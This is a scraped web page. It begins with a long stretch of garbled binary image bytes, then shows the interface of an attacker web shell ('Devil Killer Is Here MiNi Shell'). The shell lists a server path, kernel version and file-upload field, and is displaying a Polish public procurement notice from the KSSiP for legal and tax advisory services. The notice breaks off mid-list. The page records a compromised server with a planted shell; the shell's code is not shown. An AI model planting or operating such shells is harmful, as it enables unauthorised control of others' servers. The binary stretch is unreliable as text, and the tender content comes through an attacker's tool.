JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221208/0048558201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie pomocy prawnej oraz doradztwa podatkowego na rzecz KSSiP </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowa Szkoła Sądownictwa i Prokuratury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140580428</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przy Rondzie 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-547</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 617 96 55</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kssip.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.kssip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie pomocy prawnej oraz doradztwa podatkowego na rzecz KSSiP </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e57ef52-7647-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00485582</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00233625/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.14 Świadczenia obsługi prawnej oraz doradztwa podatkowego na rzecz Krajowej Szkoły Sądownictwa i Prokuratury</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=d02d3ad5-085f-43bf-b39c-b8dd2427afd5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu<br/>komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy on-line działającej pod adresem https://e-propublico.pl. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Szczegółowe informacje zawiera Rozdział 8 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzule informacyjne z art. 13 i art. 14 RODO znajdują się w SWZ, w zał. nr 1 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BA-X.2611.29.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 761250 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie pomocy prawnej oraz doradztwa podatkowego na rzecz KSSiP </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79140000-7 - Doradztwo prawne i usługi informacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79100000-5 - Usługi prawnicze</p> <p class="mb-0">79112000-2 - Usługi reprezentacji prawnej</p> <p class="mb-0">79120000-1 - Usługi doradztwa w zakresie patentów i praw autorskich</p> <p class="mb-0">79221000-9 - Usługi w zakresie doradztwa podatkowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo do skorzystania z opcji przedłużania Umowy na maksymalnie kolejne 12 miesięcy (tzw. prawo opcji) świadczenia przez Wykonawcę usług objętych Umową. Zamawiający nie jest zobowiązany do zlecenia realizacji usług w ramach prawa opcji, natomiast w przypadku wyrażenia takiej woli, Wykonawca jest zobowiązany do ich świadczenia. Zamawiający prześle oświadczenie o woli skorzystania z prawa opcji przez określony czas, na minimum 2 miesiące przed zakończeniem okresu świadczenia usług objętych Umową. Zamawiający może skorzystać z prawa opcji jednokrotnie lub wielokrotnie w okresie obowiązywania umowy. Maksymalna wartość opcji stanowić będzie iloczyn miesięcznego wynagrodzenia Wykonawcy oraz okresu trwania opcji (maksymalnie 12 miesięcy). Skorzystanie z prawa opcji nie wymaga zawarcia aneksu do umowy. Do świadczenia usługi w ramach prawa opcji mają zastosowanie odpowiednio postanowienia Umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert i ich waga:<br/>-	cena oferty – 60 pkt (60 %);<br/>-	doświadczenie osoby odpowiedzialnej za realizację zamówienia w zakresie obsługi ogólnej – 20 pkt (20 %);<br/>-	doświadczenie osób odpowiedzialnych za realizację zamówienia w zakresie obsługi zamówień publicznych – 20 pkt (20 %);<br/>Ocena ofert w pow. kryteriach dokonana zostanie na podst. inf. zawartych w formularzu ofertowym (zał. nr 1 do SWZ) oraz w wykazie osób (zał. nr 8 do SWZ). W przypadku nie wypełnienia odpowiedniej rubryki dane nie podlegają uzupełnieniu w ramach kryterium oceny ofert. <br/>1)	cena oferty<br/>punkty w kryterium cena oferty zostaną przyznane wg wzoru:<br/>cena oferty = (C min/C n) x 60 pkt<br/>gdzie:<br/>C min – cena oferty niepodlegającej odrzuceniu z najniższą ceną,<br/>C n – cena oferty ocenianej;<br/>2)	doświadczenie osoby odpowiedzialnej za realizację zamówienia w zakresie obsługi ogólnej<br/>„doświadczenie” - organizacja, kwalifikacje zawodowe i doświadczenie osoby skierowanej do realizacji zamówienia w obsłudze prawnej na rzecz Zamawiającego, obliczone według następujących wyliczeń:<br/>za każdą dodatkowo wskazaną usługę (powyżej minimum określonego w warunkach udziału w postępowaniu, o których mowa w rozdziale 6 ust. 2 pkt 4 lit. b ppkt I.II SWZ, spełniającą wymogi w nich określone), zrealizowaną przez osobę wskazaną przez Wykonawcę do realizacji zamówienia w zakresie obsługi ogólnej, realizowaną na rzecz jednostki sektora finansów publicznych w rozumieniu ustawy o finansach publicznych, nieprzerwanie przez okres nie krótszy niż 11 miesięcy każda, obejmującą swoim zakresem kompleksową obsługę prawną z zakresu prawa i postępowania cywilnego, prawa i postępowania administracyjnego, finansów publicznych, rachunkowości, gospodarki nieruchomościami, prawa podatkowego, prawa pracy i ubezpieczeń społecznych, prawa własności intelektualnej (Zamawiający wymaga, aby warunek obsługi w zakresie wyszczególnionych dziedzin prawa był spełniony łącznie w każdej wskazanej usłudze) – Wykonawca otrzyma 5 pkt., jednak nie więcej niż 20 pkt.;<br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w wykazie osób (…) – dot. kryteriów oceny ofert;<br/>3)	doświadczenie osób odpowiedzialnych za realizację zamówienia w zakresie obsługi zamówień publicznych<br/>„doświadczenie” - organizacja, kwalifikacje zawodowe i doświadczenie osób skierowanych do realizacji zamówienia w obsłudze prawnej na rzecz Zamawiającego, obliczone według następujących wyliczeń:<br/>a)	za każde dodatkowe 5 zakończonych w okresie 6 lat przed terminem składania ofert postępowań (powyżej minimum określonego w warunkach udziału w postępowaniu, o których mowa w 6 ust. 2 pkt 4 lit. b ppkt II.IV SWZ, spełniające wymogi w nich określone), w oparciu o tryby określone w ustawie Prawo zamówień publicznych, w których bezpośrednio uczestniczyła poprzez opiniowanie lub przeprowadziła, każda z osób (dwóch) skierowanych przez Wykonawcę do realizacji zamówienia w zakresie zamówień publicznych – Wykonawca otrzyma 2 pkt, jednak nie więcej niż 10 pkt.;<br/>b)	za każde dodatkowe zakończone w okresie 6 lat przed terminem składania ofert postępowanie realizowane w ramach projektów finansowanych lub współfinansowanych ze środków Unii Europejskiej, udzielone w oparciu o tryby określone w ustawie Prawo zamówień publicznych, niewykazywane w zakresie spełniania warunku udziału w postępowaniu, o których mowa w 6 ust. 2 pkt 4 lit. b ppkt II.IV SWZ, w których bezpośrednio uczestniczyła poprzez opiniowanie lub przeprowadziła, każda z osób (dwóch) skierowanych przez Wykonawcę do realizacji zamówienia w zakresie zamówień publicznych, Wykonawca otrzyma 2 pkt, jednak nie więcej niż 10 pkt.<br/>Ocena oferty w niniejszym kryterium dokonana zostanie na podstawie informacji zawartych w wykazie osób (…) – dot. kryteriów oceny ofert.<br/>Ostateczna liczba punktów (O) uzyskanych przez Wykonawcę obliczana jest jako suma wszystkich punktów poszczególnych kryteriów przy czym 1% = 1 pkt<br/>O = 1) + 2) + 3).<br/>Szczegóły w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby odpowiedzialnej za realizację zamówienia w zakresie obsługi ogólnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób odpowiedzialnych za realizację zamówienia w zakresie obsługi zamówień publicznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dot. zdolności technicznej lub zawodowej:<br/>a)	Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich sześciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie, co najmniej 2 usługi, realizowane nieprzerwanie przez okres nie krótszy niż 11 miesięcy, odpowiadające rodzajem usłudze stanowiącej przedmiot zamówienia tzn. obejmujące swoim zakresem kompleksową obsługę prawną, w tym w zakresie zamówień publicznych podlegających przepisom ustawy – Prawo zamówień publicznych, świadczone na rzecz jednostek sektora finansów publicznych w rozumieniu ustawy z dnia 27 sierpnia 2009 r. o finansach publicznych (t.j. Dz. U. z 2022 r. poz. 1634, ze zm.; dalej: ustawa o finansach publicznych) o wartości nie mniejszej niż 100 000,00 zł brutto (słownie: sto tysięcy złotych brutto), tym samym niedopuszczalne jest łączenie kilku usług świadczonych w ramach oddzielnych umów, choćby dla tego samego podmiotu, mających na celu uzyskanie w sumie wartości, co najmniej 100 000,00 zł;<br/>W przypadku wspólnego ubiegania się o zamówienie warunek ten oceniany jest łącznie dla wszystkich podmiotów i wykonawcy wspólnie ubiegający <br/>się o udzielenie zamówienia mogą łącznie wykazać jego spełnienie.<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia w oparciu o oświadczenie złożone wg wzoru stanowiącego załącznik nr 4 lub 7 do SWZ oraz wykaz usług wraz z dowodami określającymi, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>b)	Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje zespołem osób zdolnych do wykonania zamówienia, które będą uczestniczyć w jego realizacji, w tym:<br/>I.	w zakresie obsługi ogólnej, 1 (jedną) osobą, która spełnia następujące warunki:<br/>I.I	posiada uprawnienia do świadczenia pomocy prawnej w rozumieniu ustawy z dnia 6 lipca 1982 r. o radcach prawnych (t.j. Dz. U. z 2022 r. poz. 1166; dalej: ustawa o radcach prawnych) albo ustawy z dnia 26 maja 1982 r. – Prawo o adwokaturze (t.j. Dz. U. z 2022 r. poz. 1184, ze zm.; dalej: Prawo o adwokaturze), w postaci tytułu zawodowego radcy prawnego albo adwokata lub jako prawnik zagraniczny w rozumieniu ustawy z dnia 5 lipca 2002 r. o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej (t.j. Dz. U. z 2020 r. poz. 823; dalej: ustawa o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczpospolitej Polskiej);<br/>I.II	posiada, co najmniej 3 - letnie doświadczenie w świadczeniu pomocy prawnej, jako radca prawny, adwokat lub prawnik zagraniczny na rzecz jednostek sektora finansów publicznych w rozumieniu ustawy o finansach publicznych oraz posiada doświadczenie polegające na realizacji, co najmniej 3 usług obsługi prawnej na rzecz jednostek sektora finansów publicznych w rozumieniu ustawy o finansach publicznych, realizowanej nieprzerwanie przez okres nie krótszy niż 11 miesięcy każda, obejmujących swoim zakresem kompleksową obsługę prawną z zakresu prawa i postępowania cywilnego, prawa i postępowania administracyjnego, finansów publicznych, rachunkowości, gospodarki nieruchomościami, prawa podatkowego, prawa pracy i ubezpieczeń społecznych, prawa własności intelektualnej (Zamawiający wymaga, aby warunek obsługi w zakresie wyszczególnionych dziedzin prawa był spełniony łącznie w każdej wskazanej przez Wykonawcę usłudze);<br/>II.	w zakresie zamówień publicznych, 2 (dwiema) osobami, z których każda spełnia następujące warunki: <br/>II.I	posiada tytuł zawodowy radcy prawnego lub adwokata w rozumieniu przepisów ustawy o radcach prawnych lub Prawa o adwokaturze albo prawnika zagranicznego w rozumieniu ustawy o świadczeniu przez prawników zagranicznych pomocy prawnej w Rzeczypospolitej Polskiej; <br/>II.II	posiada doświadczenie w reprezentowaniu, w okresie ostatnich 6 lat przed terminem składania ofert, strony lub uczestnika postępowania łącznie w 5 postępowaniach przed: Krajową Izbą Odwoławczą lub Sądem Okręgowym w związku ze skargą na orzeczenie Krajowej Izby Odwoławczej w zakresie postępowania o udzielenie zamówienia publicznego; <br/>II.III	w okresie 6 lat przed terminem składania ofert sporządziła, jako autor, co najmniej 10 pisemnych opinii prawnych (dla zamawiającego w rozumieniu ustawy Prawo zamówień publicznych) z zakresu udzielania zamówień publicznych w oparciu o ustawę Prawo zamówień publicznych. Zamawiający uważa za prawidłowo sporządzoną opinię prawną taką, która zawiera dokładny opis stanu faktycznego, dokonaną ocenę prawną, sformułowanie potencjalnych rozwiązań oraz jednoznaczną odpowiedź na zadane pytania, sporządzoną fachowym i precyzyjnym językiem, a w razie potrzeby przytaczającą literaturę, orzecznictwo, rozważania teoretyczno – prawne lub prawno – porównawcze. Za autora opinii prawnej uznaje się osobę, która złożyła podpis na wersji pisemnej opinii, przekazanej następnie podmiotowi, który zamówił jej sporządzenie;<br/>II.IV	uczestniczyła bezpośrednio poprzez opiniowanie lub przeprowadziła, co najmniej 20 zakończonych w okresie 6 lat przed terminem składania ofert postępowań prowadzonych w trybach określonych ustawą Prawo zamówień publicznych; przez zakończone postępowanie należy rozumieć postępowania zakończone podpisaniem umowy z wykonawcą.<br/>Zamawiający wymaga, aby ww. osoby realizowały obowiązki nie więcej niż w jednym zakresie wskazanym powyżej (nie dopuszcza się łączenia realizacji obowiązków w zakresie ppkt I i II przez jedną osobę).<br/>Ocena spełnienia tego warunku będzie dokonana na zasadzie spełnia/nie spełnia w oparciu o oświadczenie Wykonawcy złożone wg wzoru stanowiącego załącznik nr 4 lub 7 do SWZ oraz na podstawie wykazu osób złożonego wg wzoru stanowiącego załącznik nr 10 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dokumenty składane na wezwanie Zamawiającego. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>w celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu:<br/>1)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 6 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór wykazu stanowi załącznik nr 9 do SWZ.<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu stanowi załącznik nr 10.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, składany w celu oceny oferty z zastosowaniem kryteriów oceny ofert (załącznik nr 8 do SWZ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta winna zawierać wszystkie dokumenty wymienione w SWZ w następującym układzie:<br/>1) 